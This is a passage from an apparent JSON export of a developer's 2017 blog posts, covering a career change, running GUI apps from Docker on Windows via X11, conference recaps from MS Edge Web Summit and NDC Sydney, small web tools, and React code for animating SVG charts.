This was a really great opportunity where I was put in the position to do the Enterprise Architecture, set up a technical architecture, work with a team distributed across 4 cities and 3 countries and start planning out a roadmap for how we’d evolve from what was mostly a PoC to a platform supporting dozens of delivery teams. Admittedly there were weeks where I’d spend every day in meeting rooms, which is tough, but I learnt a heck of a lot on that project and about how to run projects at scale.\nThe End of an Era In September I hit 7 years at Readify, and it’s also when I hung up my PC boots. After 12 months I realised that while there were parts of the role I enjoyed there were also parts I didn’t enjoy, or at least, didn’t find myself being the best fit for at this point in my life.\nSo instead I’ve taken a transfer within Readify to a new role as a Technical Pre-Sales Consultant, so I’m now part of the sales team!\nWhat I realised when I moved into the PC role was that the stuff that I enjoyed the most was understanding the why of a project, working with clients to define a project, how it’d work and importantly, just what the underlying business motives are.\nNow onwards and upwards into the world of sales!\n", "id": "2017-09-27-readify-pc-12-months-on" }, { "title": "VS Code, Linux, Docker for Windows", "url": "https://www.aaron-powell.com/posts/2017-09-21-vscode-linux-docker-windows/", "date": "Thu, 21 Sep 2017 13:41:09 +1000", "tags": [ "linux", "docker" ], "description": "", "content": "I’m currently writing a blog post on VS Code for Linux, running inside a Linux docker container, hosted by Docker for Windows (on my Windows 10 machine), with the UI being piped across to Windows using an X11 server.\nWhy? Because why not!\nWhat the hell is this all about? Back when I was first getting into computers I was a Linux kid, I ran a Linux server at home to do local DHCP/squid proxy/etc. and I ran Linux on my laptop (a lovely 486 laptop with an external network card) which was always fun to get drivers for. I was compiling my own kernel, experimenting with every different distro that I could get my hands on and living mostly on the terminal.\nAs I moved to becoming a web developer I found myself developing on ASP.NET 1.1 (well, started with ASP, then moving to .NET 😛) so my Linux machines would get less and less love, eventually finding themselves relegated to the back of the closet.\nSo what’s this trip down memory lane got to do with anything? Well unless you’ve been living under a rock you’ll be aware of Docker which makes it really easy to run containerised Linux applications on Windows (and Windows containers, but that’s not relevant for this post).\nI’m a big fan of Docker, I find it really useful not just for working out how to deploy something through to production, but also for running applications you don’t want to install, I use it when I come across single-use applications like 7zip (because someone once sent me a .7z file)!\nAnd also if you know me you’ll know that I quite like to do things that people would think are, well, dumb. And when talking to some people while doing Docker training they’ve asked about GUI applications. Now naturally I said this was probably not possible as you can only really drop into a terminal session.\nWell, I was then talking to another friend of mine, Jason Stangroome, who does a lot of work with Docker, and he pointed out that it’s totally possible. This is when I got a TIL on how GUIs work for applications using X11.
It turns out that X11 actually works across network protocols to draw the display. Now in hindsight this actually makes a lot of sense because if you’ve ever worked with a remote Linux (or Unix) server you can connect to GUI applications it runs, I remember doing that with PuTTY back in the day.\nThis then got my brain turning, if you could work out how to put something with a GUI into a container and launch it, it’s just a matter of starting an X11 server that it connects to. Like any good idea it turns out that others have already done it, and Jason pointed me to the work of Jessie Frazelle. Jessie wrote a blog about how she runs applications in containers, including applications with GUIs.\nFrom this I decided it was time to work out how to make this work on Windows.\nRunning Linux GUIs on Windows from Docker The first thing you need to do is go out and find yourself an X server for Windows. Now it seems there are a number of different options available; unfortunately it’s a little more unpleasant than you’d like because all the OSS servers I found are hosted on SourceForge and, well, I refuse to trust anything that comes from there! So instead I went with the free version of MobaXterm, which doesn’t even require an install.\nNow you’re ready to go, fire up MobaXterm and configure its X server, I left it running on the defaults using ‘Multiwindow Mode’ so each application that I run through it can be managed independently.\nThe only thing left for me to do is to actually run something against it. I headed over to Jessie’s Dockerfiles on GitHub to find something to play with. To ensure my craziness was properly justified I thought I’d grab VS Code, and it’s also quite a basic container to run.\nAnd running it was simple:\nPS> docker run --rm -e DISPLAY=192.168.2.13:0.0 -v "$(Get-Location):/code" jess/vscode I ran this from my PowerShell terminal and the above is what you get! The only thing I changed from the example is that I don’t mount /tmp/.X11-unix as a volume (I don’t have that on Windows), the DISPLAY environment variable doesn’t require the unix prefix and I don’t include --display /dev/dir (mainly because I don’t know what it does 😛).\nSo there you go, we are now running a GUI application from a Docker container running on Docker for Windows, launched from PowerShell, mounting a folder from your Windows OS.\nSure the font doesn’t look quite right, it’s somewhat laggy when you’re typing (making writing a blog a bit odd) and I don’t have my VS Code settings, but I’ve got it containerised damnit!\nRunning Linux GUIs on Windows from Docker in WSL So far I’ve managed to get everything running through a number of layers, but there’s one more layer I wanted to add, Windows Subsystem for Linux, aka WSL. This is a native Linux implementation running on Windows allowing you to run Linux binaries. My first step was to install Docker in WSL, which is just a matter of following the standard install instructions.
But one thing you can’t do is run Docker containers in WSL. That’s not a problem though, the Docker client just points at a running daemon somewhere, so we can point the Linux client at the daemon running in Windows (you have to disable TLS over TCP too, not sure why, you just do)!\nSo we can now run this:\n$ docker -H localhost:2375 run --rm -e DISPLAY=192.168.2.13:0.0 -v pwd:/code jess/vscode And there you have it, you’re using a Linux docker binary to connect to Docker running on Windows to run a Linux container on a VM in Hyper-V, to connect to an X Server running on Windows to run a text editor written in JavaScript.\nBecause why the hell not!\n", "id": "2017-09-21-vscode-linux-docker-windows" }, { "title": "MS Edge Web Summit 2017", "url": "https://www.aaron-powell.com/posts/2017-09-15-msedge-summit-2017/", "date": "Fri, 15 Sep 2017 16:08:37 -0700", "tags": [ "ms-edge", "mvp", "conference" ], "description": "My takeaways from the MS Edge Web Summit", "content": "I’m currently sitting in LAX airport waiting on the LAX ✈ SYD leg (the SEA ✈ LAX one is already done), preparing to fly back to Sydney after a whirlwind trip (I landed on Tuesday afternoon, it’s currently Friday afternoon and I’m flying back 😛) over to attend the MS Edge Web Summit.\nI was invited due to my contributions as a Microsoft MVP, an award that I’ve been proud to hold for 7 years now.\nWhen I arrived in Seattle I met up with fellow MVPs, Chris Love, Jonathan Creamer, David Wesst, Ryan Hayes and Jared Faris, then we headed to the Seattle Web Performance meetup, which was their relaunch event. It was great to meet some other people in the web community, even if us out-of-towners did outnumber them and we couldn’t contribute much to how the meetup should be run 😛.\nDay 1 The next day was where the fun started, we rolled on up to the summit location and got ready for a day of learning.\nKeynote The event kicked off with Charles Morris delivering the keynote. There was a celebration of the 2nd birthday of MS Edge, and a bit of a look at how that has gone. They had two members of the “Shell team” (the UI of MS Edge) talk about how they gather feedback to prioritise what to work on next, which includes browser/OS telemetry, internal Microsoft feedback, external feedback through the Windows Insiders program and twitter itself (they showed off two specific UI issues that have seen a lot of twitter noise, editing favorites and the address bar moving on focus). I really enjoy these kinds of insights, as someone who is vocal about what I do/don’t like, being able to understand how my feedback is consumed by the team helps humanise the process, you’re not just shouting into a void, people are listening.\nThe second half of the keynote was then focused on EdgeHTML, the rendering engine of Edge. There was talk about the evolution of Edge 12 - 16 (with 16 coming out in the Fall Creators Update in October, or available now on Insiders if you’re running it like me) and I also learnt that the easiest way to see what’s new in a release is https://aka.ms/devguide_edgehtml_16 and you just change the number on the end to the version you want. Charles also covered off the other resources that there are for MS Edge, like the status site, dev resources, etc. There was also talk about the focus of EdgeHTML going forward, and that’s broken up into 4 categories, improving the fundamentals (performance, accessibility, reliability, etc.), Progressive Web Apps (PWAs), Dev Tools (aka F12) and interop/new standards.
I’m super excited about PWAs, but I’ll talk about that a bit later on.\nThe final part of the keynote was touching on the interop story, Apple still holds a massive share in the web developer market and *nix environments is where a lot of tools are still born. So Windows Subsystem for Linux (WSL) was introduced and as was the new partnership that the Edge team is embarking on with BrowserStack. Through this partnership Microsoft is making Edge free for both Live and Automated testing on BrowserStack, while also working with them to have the versions of Stable, Stable - 2 and vNext. This combined with the VM’s available for free make it really hard to argue that if you’re not running Windows 10 it’s too hard to test on Edge.\nBuilding a safer browser The second session for the day was on what the Edge team is doing to make the browser more secure, by Nathan Starr and was a dive into the low-level Windows “stuff” that is done to help secure the web. As a web developer this is not something that I ever really think about, when I think about web security I think about things like HTTPS, not putting credentials in cookies, appropriately storing passwords in a database, etc. and I’ve never really thought about things like how the browser blocks malicious actors from injecting code, rewriting memory, spawning new processes and things like that. If you want to get an appreciation for what sounds like a really hard thing to do (honestly, I didn’t understand much of what was talked about!) check it out.\nPWAs and ServiceWorkers After a break and some hallway tracks it was the topic that I think most people where there to see, Progressive Web Apps and Service Workers. This is one of the most exciting features coming to the web in recent years (I talked about it in my NDC Sydney recap) and Edge 16 ships with a fairly complete implementation behind a flag (they want feedback from users on it before considering it stable) and with WebKit recently starting development all four major browsers are now invested.\nThe Service Workers talk was a bit of a ‘hello world’ talk, which I’ve seen before, but what I did learn from it was that F12 already has support for Service Workers, this I didn’t know, I was relying on the Chrome dev tools! Ali also talked a bit about IndexedDB and the change in the storage limits to be pretty much unlimited, which excites me as someone who’s a know IndexedDB fan. After the session I managed to get a hallway conversation going with Ali about the missing pieces of IndexedDB in Edge. Basically it’s down to a capacity issue, his team run both Service Workers and IndexedDB, and Service Workers are the higher priority, which I guess we can live with, let’s get that shipped!\nJavaScript and TypeScript Then it was time for Brian Terlson to talk about ChakraCore and TypeScript, which was a bit about the journey of ChakraCore into being an Open Source project and why they went about doing it (mostly they couldn’t find a reason not to). He then talked about some of the performance optimisations with ChakraCore, such as the work they’ve done around minified code which, contrary to popular belief, is generally byte-for-byte slower than un-minified code. This probably comes as a shock to most web developers, but part of it is logically, minified code has more code per byte so it’ll be slower, but moreover some of the tricks to compress code as small as possible don’t result in high performance operations, such as exploiting type coercion for false with !!0 or the comma operator. 
Through telemetry and analysing websites they can detect these patterns and optimise for them. But there are other optimisations that Brian talks about, like deferring code parsing.\nThe TypeScript portion of the talk was encouraging people who either hadn’t looked at TypeScript, or had dismissed it in the past, to give it another look. He started with a simple JavaScript file and added // @ts-check to the top of it, which tells the TypeScript compiler (via VS Code as an editor) to try and do some level of type validation of the file. This picked up a couple of simple errors and used the JSDoc comments to do some basic type support. He then renamed it to a .ts file, removed the comment and showed how that improved detection for a few other edge cases that you might’ve missed. He also showed off the extract function feature that’s coming in the next compiler release, which is really cool and which I can’t wait for!\nSonar, the web’s linter sonar (https://sonarwhal.com) is something that Microsoft released earlier this year as an Open Source project under the JS Foundation (formerly the jQuery Foundation). I remember seeing it announced but I didn’t get what it was, so I filed it under ‘future reading’ (which we all totally get to, right 😉).\nWell Antón Molleda was here to tell us all about sonar and it’s kind of the next evolution of the web compatibility tool that Microsoft released around the IE10 days, where you could paste in a URL and it’d tell you a bunch of things wrong with your site.\nThe way it works is that it’s a node tool that you install globally or locally, and then run it against pages within your website (it doesn’t seem to do crawling at this point in time) and then it “lints” your page using defined rules against your browser set. The linting covers a number of different rules, from whether you return too small an error page response (which has issues in IE and old Chrome), to whether you have the right Apple icons, what your accessibility is like or whether you use any libraries with JavaScript vulnerabilities. Like a standard linter you can enable/disable rules as you need but the team has taken it a step further and made it easier to disable sets of rules based on the types of browsers you’re targeting. Say you’re building a purely mobile website, well it doesn’t make sense to support any version of IE, as there’s no mobile device that runs that (and is supported), so you would add a browserList property to your sonar config file and say "browserList": "not ie", then bam, all rules that are specific to only IE are excluded!\nAntón also showed the online version they are working on, which he had only got working the night before! The online one aims to help you track your linting over time.\nI’m going to look at how to get it integrated into my website, but there’s a slight issue in how my 404s work that crashed sonar (but they fixed it already for me!) and well, I got around 84 issues with that rule disabled 😟.\nCSS Grids My CSS skills are decent but are starting to become a bit dated, I know all about box model hacks from IE 6 but the newer stuff that’s come in I simply haven’t got around to learning. CSS Grids is one such thing that I see a lot of excitement about on twitter but have never looked at myself. Melanie Richards, who I saw as an awesome person for the Edge team to have got, gave us an overview of CSS Grids in Edge 16. If you’re doing any sort of UI work but haven’t looked at CSS Grids yet, do yourself a favour and watch this talk.
All of us MVPs came away from that session going “wow, CSS Grids are so cool!” and that was partly because of how cool they are, but also just how simply and elegantly Melanie explained them.\nShe also talked about the differences from the -ms-grid CSS properties that Edge has, which are actually the precursor to CSS Grids, and how to do feature detection using @supports.\nMaking ecom better If you’ve been following Edge development, one of the big features they’ve been touting that they included in Edge 15 was the Web Payments API. Molly Dalton delivered a session on Web Payments that took a look back at how we do ecom, and how that basically hasn’t changed since it was first done in the ‘90s. She then showed how it works, some of the features around complex checkouts, and then had a representative from Shopify come up to demo how they are integrating it into their platform.\nAnyone who’s working at a company that does ecom needs to be looking at Web Payments, it’s a great step forward in how we do payments online and it exists in Edge, Chrome 61+ and Chrome for Android 53+, and behind a flag in Firefox. Apple has their own thing in ApplePay, but they are involved with the standards body that’s working on Web Payments, so hopefully we’ll see a convergence in the future.\nF12 Ahhh F12, the tools you love to hate. Jacob Rossi gave a bit of a history lesson on F12 in his session about the future of F12, in which he talked about how the tools really haven’t been touched since Edge first came to be.\nThat’s about to change. I’m a big fan of Jacob’s work, I’ve been following him as he has moved around the Web Platform team and I’m really excited to see him at the helm of F12. With Edge 16 we’ll see a few new features, like a new console that supports things like console.table, collapsing repeated messages together and styling output, some tweaks in the DOM inspector and how DOM breakpoints work, and also some really cool accessibility tools.\nBut the real meat of this talk is what’s coming next. Over the next while the team is going to be rebuilding the tools. One of the things that Jacob talks about is introducing a JSON based API that the tools can use to talk to the browser, rather than being baked in like they are today. This is somewhat similar to how Chrome’s dev tools work, but they want to take some of the learnings from Chrome and improve on them. Why not just implement the same as Chrome? Well you’ve got to remember that the internals of Edge are quite different to Chrome (and Firefox, and WebKit), so a one-size-fits-all approach would mean that you’d have to compromise a lot. I really like this API approach to dev tools as it means that, in theory, it will be easier for 3rd parties to build their own tools as well, kind of like the Chrome debugger in VS Code. Naturally all of this will take quite some time to achieve so we’ll just have to wait and see how it all plays out, and of course give feedback along the way.\nOh, and they have finally added an IndexedDB explorer to F12, one feature I’ve been bugging them about since the IE10 days 😛.\nHow do they prioritise features? My personal favourite talk of the day was Greg Whitworth’s talk on how they plan Edge. Greg talked through some of the stuff in the keynote, but in a lot more depth. I think that we as web developers really don’t take into consideration just how complex building a browser is, I know I don’t really appreciate it. There are so many different sources of data to consume that feed into decisions, so many moving parts to align, etc.
One thing that I found quite interesting was how he talked about UserVoice feedback. In Edge 16 many of the top voted UserVoice features are being shipped, but there are a bunch of other highly voted features that aren’t being shipped, take Shadow DOM for example. What Greg talks about is how they look at votes-over-time as well as the raw vote count. A feature (and I’m not saying that Shadow DOM is an example of this) might have a massive spike in votes, go up really high, but then drop off in people pushing for it. Whereas another feature might not be the #1 voted feature, but it constantly gets votes. This can indicate that one feature is a wide-reaching, consistent pain point, whereas the other might’ve been a tweetstorm-driven upvote.\nIf you’ve only got time to watch a single session from Edge Summit I’d say watch this one.\nVR, AR, MR We had two people from the WebVR team on Edge, Nell Waliczek and Lewis Weaver, talk about the new Windows Mixed Reality devices that are coming and how to use them with WebVR. As a web developer WebVR is something that I’m struggling to get excited about. Don’t get me wrong, I think that VR (and AR and MR) are really amazing pieces of technology, they’ll really change the way we interact with computers, but it’s just not my thing.\nThat said, the session wasn’t a bad session, it did a good job of covering off how to get started with WebVR, talked about some of the popular libraries that you can use to get started, and I got to play with one of the headsets during the mixer, but I’ll leave the development of WebVR to others and just be a consumer 😉.\nHallway track I’ll admit that I didn’t catch the last few sessions of the day on performance and accessibility, instead I went to have some conversations with some of the Edge team who were around in the breakout area. Anyone who’s been to a conference will be aware that these kinds of conversations are just as useful and insightful as any session you might get to. I got to chat to Jacob a bit more about the planned changes around F12, chat to the people behind sonar and play with the MR headsets with some WebVR demos.\nDay 2 The second day (yeah, I didn’t fly to the states for just a single day, I did spend 2 days there!) myself, the other MVPs and the other invited experts were bused over to Microsoft’s campus to spend a day with the team. Unfortunately I can’t divulge what went down in much detail, it was an NDA event, but there are a few things I can share.\nWSL We had Rich Turner from the Windows Console team talk about WSL, what their goals are and some of the inner workings of it. The way WSL works is really quite fascinating, the Windows team had to implement the Linux syscalls from scratch by observing how Linux behaves, they couldn’t just copy Linux’s source, or even look at it, as that would be a violation of the license. That’s crazy!\nI then proceeded to grill Rich and some of his colleagues from the Windows Container/Docker for Windows team who were there about Docker, its relationship to WSL, or at least how to use it effectively from WSL. I’ve got a few things I want to experiment with that would make for a good blog post on their own.\nRich’s a really interesting guy with a great set of stories about working on the kernel, and he was really happy to tell me that I’m mad when I was telling my stories about how I would prefer something to be in a Docker container than actually installed.
I call nerd credit when one of the top people on the Console team tells you you’re mad!\nEdge, OSS and the future A lot of the day was spent hanging out with groups from the team in round table discussions. While I can’t go into any specifics of what was discussed, some of the key takeaways are that accessibility is a really high priority for the Edge team, performance and stability will keep a lot of people busy, and if we thought the shift towards being more open (communication, releasing tools as OSS, etc.) had peaked, well, it’s only getting started. If you want to help shape how the web platform works there’s no better time than the present to get active.\nConclusion I want to say a big thanks to Kyle Pflug who was one of the key organisers, and responsible for getting myself and the other MVPs there. Also a big thanks to all the Edge team who were around, I got to meet a number of people who I respect in the community and have chatted to on Twitter, such as Sean Larkin, Rachel Nabors, Chris Heilmann, Antón Molleda, Patrick Kettner and many others. And on that note, the number of Edge team members you can now find on Twitter is really a sign of the times, with them engaging directly with the community.\nThe work in F12 really blew me away. I always figured they’d be doing something around it in the upcoming releases, I’d noticed a few things popping up recently, but never did I expect anything as big as what they are going with.\nI didn’t expect to be as blown away by CSS Grid as I was, I’m ready to have a crack at it myself and see what I can do with it.\nBut most of all I love this new Microsoft, whether it’s the .NET team publishing everything as Open Source projects, the OS team moving to a 6-monthly release cycle or the Edge team using Twitter as a primary input source to their planning.\nDo yourself a favour, check out some of the talks (full agenda here), and join in the ride to make a better web for all of us.\n", "id": "2017-09-15-msedge-summit-2017" }, { "title": "httpstat.us now supports HTTPS", "url": "https://www.aaron-powell.com/posts/2017-09-01-httpstatus-now-https/", "date": "Fri, 01 Sep 2017 10:10:53 +1000", "tags": [ "httpstat.us" ], "description": "", "content": "A few years ago Tatham Oddie and I launched a little website for testing HTTP responses called httpstat.us.\nWith websites being encouraged to move to HTTPS-first (like how Google is pushing for it) and the cost of HTTPS no longer an issue thanks to Let’s Encrypt, I finally got around to enabling HTTPS on there.\nNow you can test status codes from secured sites without mixed-mode warnings.\n", "id": "2017-09-01-httpstatus-now-https" }, { "title": "WhatKey", "url": "https://www.aaron-powell.com/posts/2017-08-30-whatkey/", "date": "Wed, 30 Aug 2017 16:03:46 +1000", "tags": [ "whatkey", "javascript", "web", "project" ], "description": "The relaunch of my whatkey service", "content": "Nearly 7 years ago (seriously, that long?!) I launched a website to help find what keyCode you hit in JavaScript.\nWell the domain lapsed, the app went offline on the host, and ultimately I didn’t care too much to fix all of that. Well never fear, I’ve brought it back from the dead!\nYou’ll now find WhatKey living on my website.
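If you haven’t needed it before, this is the kind of information the site surfaces; here’s a quick sketch (my own, not WhatKey’s actual source) that you can paste into a browser console to see the same values:
// Log the legacy keyCode (and the newer `key` value) for every key you press.
document.addEventListener('keydown', (event) => {
  console.log(`keyCode: ${event.keyCode}, key: ${event.key}`);
});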
I’ve also done a little tweak to it so that you can see all keyCode values at the same time.\nSo go forth and inspect those keyboard events!\n", "id": "2017-08-30-whatkey" }, { "title": "NDC Sydney Recap", "url": "https://www.aaron-powell.com/posts/2017-08-30-ndc-sydney-recap/", "date": "Wed, 30 Aug 2017 11:46:02 +1000", "tags": [ "ndc", "ndc-sydney", "conference" ], "description": "", "content": "In August this year I was lucky enough to speak at NDC Sydney for the 2nd time, this year I used the material from my redux series for one talk and did a second talk about getting started with Docker (which I’ll write about separately).\nBut this isn’t a post about my talks, instead I want to talk about some of the things that I learnt at NDC. I tried to get to a variety of talks, some directly related to what I do day-to-day, some less so.\nWeb vNext Logically I went to a few web talks, they are obviously very related to my area of expertise and passion, so I jumped into the two sessions from Patrick Kettner, one on Service Workers and one on progressive web applications (or more accurately, doing progressive enhancements in web applications).\nService Workers Service Workers interest me as a technology, I’ve always been looking at ways that we can do offline-first applications (see my Flight Mode series, which is a bit dated now), but I’ve never had time to get into the basics of it. Well that’s just what a conference is for, ey! It was a good intro, covered off the basics of the API and the features that it can give you, while looking at some initial scenarios that you might want Service Workers in.\nSome key tips to take away from Service Workers are:\nMake sure you feature detect first (if ('serviceWorker' in navigator) { ... }) Use ES2015+ code, all browsers that support Service Workers support that! The Service Worker Cookbook is a great getting started resource Now I need to find some time to play around with the ideas that I’ve got for using them. Maybe I’ll put together some blog posts of my own, extending the Flight Mode series.\nProgressive web applications This talk wasn’t to be confused with PWAs, and while it did talk about PWAs a bit, it was more generally about ‘how to make a web application with progressive enhancements’. There wasn’t anything particularly revolutionary in this talk, but there were some fun takeaways, like how Pokedex.org uses a WebWorker to do virtual DOM diffs rather than doing them on the UI thread, essentially pushing the expensive processing portion of an application to a ‘background’ thread. I can see this technique being useful when working with large datasets in the browser.\nBreaking my brain with .NET There were a few speakers at NDC that I’d always wanted to see speak, or have seen speak before and always learn something enjoyable from.\nPushing C# to the limit If you get a chance to see Joe Albahari, aka Mr LINQPad, speak, go check it out. In this session he was talking about something that I don’t think I’ll ever need to do, but it’s nice to know how to do it: he was basically covering things like pointers, unsafe memory and writing your own cross-process communication framework. I walked out of there with a lot more of an appreciation of what it takes to build an application that has performance-critical operations and how complex it is to do memory management.\nServerless and FSharp An F# talk from Mathias Brandewinder, well of course you have to attend that. A talk on Azure Functions in F#?
That is a great combination (and it’s a frustration I’ve come up against a number of times), so I headed off to that one to learn about how best to go about it.\nThe outcome I took away is that C# and Node.js are still the ones getting the most love from the Azure Functions team (sad, but not surprising), but you can get F# working nicely in a scripting manner through some #if directives to open the right namespaces. Ultimately though you’re better off going down the path of compiled functions if you want F#, as then it’s a lot more obvious what dependencies you have included, rather than relying on the magic of the hosting environment.\nMathias said he’ll publish some info around what he presented, since I didn’t scribble my notes fast enough 😜.\nPlanning for failure Jimmy Bogard’s talk, to me, was less about the technical side of what he was covering and more about framing solutions for a business.\nThe crux of the talk was that you have a system that does a few things as a single unit of work:\nSave an order to your DB Process a payment via Stripe (or any payment provider) Send an email Update the order as paid Drop a message into a message queue Now treating this as a single unit of work introduces a problem, how do you handle failure in any of those steps? “Distributed transactions” I hear you say? Yeah… we’ve all tried that in the past haven’t we 😕.\nJimmy went through each of the steps in the process, broke them down into the true goal of the step, and then looked at how we can frame handling its failure to the business. For some of the things a complete failure is acceptable, others might have a retry option, and others are something that we can handle in more of a background job.\nReally, the core takeaway from this talk shouldn’t have been how to use technology to solve failure points, but instead to understand just where those failure points are and how you present your options for handling them to the business.\nCan they accept a complete failure? Can it be pushed across to a manual process in the event of failure? Can you perform a retry? Does the action have to be done immediately? Knowing your options, the pros and cons, and then being able to articulate them to the business is key.\nNot all tech While NDC is a tech conference, not every talk there was about tech, there were talks about career growth, leadership and workplace happiness.\nSo on the last day of the conference I went to Kylie Hunt’s talk on workplace happiness (and not just because of the promise of TimTams). Being a leader within Readify means that I do whatever I can to ensure a happy and healthy working environment for my colleagues. Kylie shared her experience as a workplace happiness coach on how to handle different types of bad bosses, why we need to stop celebrating overwork, how constant 10 hour days are dangerous, how unconscious (or conscious) bias, resulting in unfairness (perceived or real), can impact people’s productivity, and, an important topic at Readify, how to embrace change (whether change within our clients or within Readify itself). Do yourself a favour and watch the video from NDC Oslo.\nWrap up I really enjoy NDC Sydney, it’s such a different scale of event to most conferences around, and there’s such a variety of talks to get to.
All the talks were recorded so we can expect the videos to appear online over the coming months, and I’ve got a bunch of sessions that I’m going to go back and watch!\n", "id": "2017-08-30-ndc-sydney-recap" }, { "title": "React SVG Chart Animation", "url": "https://www.aaron-powell.com/posts/2017-08-10-react-svg-chart-animation/", "date": "Thu, 10 Aug 2017 20:39:43 +1000", "tags": [ "react", "svg" ], "description": "", "content": "In my last post I talked about animating SVG objects and how to combine that with React. As I mentioned there, the catalyst for it was looking into how we could do charts.\nWell of course after my initial experiments I wanted to actually look at how to do a chart.\nCreating a basic chart For this I started with the great walkthrough on SVG Charts at CSS Tricks, and I’m going to use the Line Chart example for this (but with randomly generated data).\nNow we know what the basic React component would look like:\nconst Line = ({ data }) => (
  <polyline
    fill="none"
    stroke="#0074d9"
    strokeWidth="2"
    points={data} />
);
But that’s not what we’ve come here to look at, rendering elements to the DOM is pretty basic, let’s start thinking about animation.\nAnimating a line chart The kind of animation I want to go with for this is having the lines grow from the x-axis up to their final resting point on the y-axis.\nAlso, rather than just having an array for our input data, I’m going to try and represent something a bit more realistic by having an object. My data will look like this:\nconst data = [{ x: 0, y: 120 }, { x: 20, y: 60 }];
Like my last post I’m going to use a Higher Order Component for wrapping up the logic around handling the animation. Let’s start with the constructor and render:\nconst animateLine = (WrappedComponent) => {
  class Wrapper extends React.Component {
    constructor(props) {
      super(props);

      const { xSelector, ySelector, data } = props;

      let mappedData = data
        .map((d) => [xSelector(d), ySelector(d)])
        .reduce((arr, curr) => arr.concat(curr), []);
      let max = data.map((d) => ySelector(d)).sort((a, b) => a - b).reverse()[0];
      let liveData = mappedData.map((x, i) => i % 2 ? max : x);

      this.mappedData = mappedData;
      this.max = max;

      this.state = {
        data: liveData,
        count: 0
      };
    }

    render() {
      return <WrappedComponent data={this.state.data} />;
    }
  }

  Wrapper.displayName = `AnimationWrapper(${WrappedComponent.displayName || WrappedComponent.name || 'Component'})`;

  return Wrapper;
};
Now, we’re expecting 3 props on the component:\nAn array of data A function for getting the x value from a data item A function for getting the y value from a data item We then create a new array that is a flattening of the data, so it’d look like:\n[0, 120, 20, 60]
So now we need to prepare for our animation; to achieve this we flatten the line that we first draw and then we’ll walk it back up to the real values. To do this we need to find the largest y value, which I’m putting into a variable called max.\nFinally I need to create that flattened data set, which is done by taking the array of points and turning all the y points into the max value (because we start at the bottom of the graph, which is approximately the height of the SVG). Now the data that we’re rendering to the UI looks like this:\n[0, 120, 20, 120]
Great, we’ve got a hidden line graph that doesn’t actually represent our data… not really useful.\nTime to start building the animation.
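As an aside, here’s roughly how I’d expect this wrapper to be consumed, assuming the Line component from the top of the post; the selector props line up with what the constructor destructures, and the SVG dimensions are just illustrative:
const data = [{ x: 0, y: 120 }, { x: 20, y: 60 }];

// Wrap the presentational component with the animation HOC.
const AnimatedLine = animateLine(Line);

ReactDOM.render(
  <svg width="500" height="120">
    <AnimatedLine
      data={data}
      xSelector={(d) => d.x}
      ySelector={(d) => d.y} />
  </svg>,
  document.getElementById('main')
);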
Like the last post we use componentDidMount to start the animation and componentWillUnmount to stop it if needed. Here’s the componentDidMount:\ncomponentDidMount() {
  const animator = () => {
    if (this.state.count >= this.max) {
      cancelAnimationFrame(this.rafId);
      return;
    }

    const newData = this.state.data.map((data, index) => {
      if (index % 2) {
        if (data > this.mappedData[index]) {
          return data - 1;
        }
      }
      return data;
    });

    this.setState({ data: newData, count: this.state.count + 1 });
    this.rafId = requestAnimationFrame(animator);
  };

  this.rafId = requestAnimationFrame(animator);
}
Let’s break it down, or more accurately, break down the animator function, which is really what does the animation for us.\nFirst step, the reason we have the max on the component is so that we know when to stop trying to animate a point. That’s what this logic is for:\nif (this.state.count >= this.max) {
  cancelAnimationFrame(this.rafId);
  return;
}
Second step, start taking our temporary data a bit closer to the real data:\nconst newData = this.state.data.map((data, index) => {
  if (index % 2) {
    if (data > this.mappedData[index]) {
      return data - 1;
    }
  }
  return data;
});
We’re going to map over the data and:\nIf the current index is even, it’s an x-axis value, so just return it, we’re not moving that If the current index is odd and it’s still greater than the target value, subtract 1 from it Otherwise just return the current value Third step is to put that new array into state (and cause a re-render) as well as increase the loop count, then kick off requestAnimationFrame again.\nAnd that’s all, we have a lovely animated line chart.\nConclusion Again we’ve seen that a small bit of code and React components can make a very easy to read animated SVG without any external dependencies.\nI’ve created another example that you can see here in action, and the data is randomly generated so reloading the page will get you a new chart each time 😄.\n", "id": "2017-08-10-react-svg-chart-animation" }, { "title": "React SVG Animations", "url": "https://www.aaron-powell.com/posts/2017-08-08-react-svg-animations/", "date": "Tue, 08 Aug 2017 20:58:32 +1000", "tags": [ "react", "svg" ], "description": "", "content": "I’ve been working on a project recently where we’re using React for the UI component of it. While starting to plan out the next phase of the project we looked at a requirement around doing charting. Now it’s been a while since I’ve done charting in JavaScript, let alone charting with React, so I did what everyone does these days and shouted out on the twittersphere to get input.\nJoke replies aside, there was the suggestion that, since I’m using React, I should just do raw SVG and add a touch of d3 to animate if required.\nWell that’s an approach I’d never thought of, but pondering it a bit, it made a lot of sense. If you look at charting libraries what are they doing? Providing you with helper methods to build SVG elements and add them to the DOM. And what does React do? Creates a virtual DOM which is then rendered to the browser in the real DOM. So using an external library what you find is that you’re creating elements that live outside the virtual DOM and as a result can cause issues for React.\nThat was all a few weeks ago and while the idea seemed sound I didn’t need to investigate it much further, at least not until earlier this week when charting + React came up again in conversation.
So I decided to have a bit of a play around with it and see how it’d work.\nBasic React + SVG Honestly drawing SVG’s in React isn’t really that different to doing any other kind of DOM elements, it’s as simple as this:\n1 2 3 4 5 6 7 const Svg = () => ( <svg height="100" width="100"> <circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" /> </svg> ); ReactDOM.render(<Svg />, document.getElementById('main')); Ta-da!\nReact + SVG + animations Ok, so that wasn’t a particularly hard ey? Well how if we want to add animations? I grabbed an example off MSDN (example #2) to use as my demo.\nI created a demo that can be found here. Comparing that to the original example code it’s a lot cleaner as we no longer need to dive into the DOM ourselves, by using setState it’s quite easy to set the transform attribute.\nNow we’re using requestAnimationFrame to do the animation (which in turn calls setState) which we can use the componentDidMount to start and componentWillUnmount to stop it.\nAdding HOC So we’ve got a downside, we’re combining our state in with our application code, so what if we wanted to go down the path of using a Higher Order Component to wrap up the particular transformation that we’re applying to SVG elements.\nLet’s create a HOC like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 const rotate = (Component, { angularLimit, thetaDelta }) => { class Rotation extends React.Component { constructor(props) { super(props); this.state = { currentTheta: 0 }; } componentDidMount() { const animate = () => { const nextTheta = this.state.currentTheta > angularLimit ? 0 : this.state.currentTheta + thetaDelta; this.setState({ currentTheta: nextTheta }); this.rafId = requestAnimationFrame(animate); }; this.rafId = requestAnimationFrame(animate); } componentWillUnmount() { cancelAnimationFrame(this.rafId); } render() { return ( <g 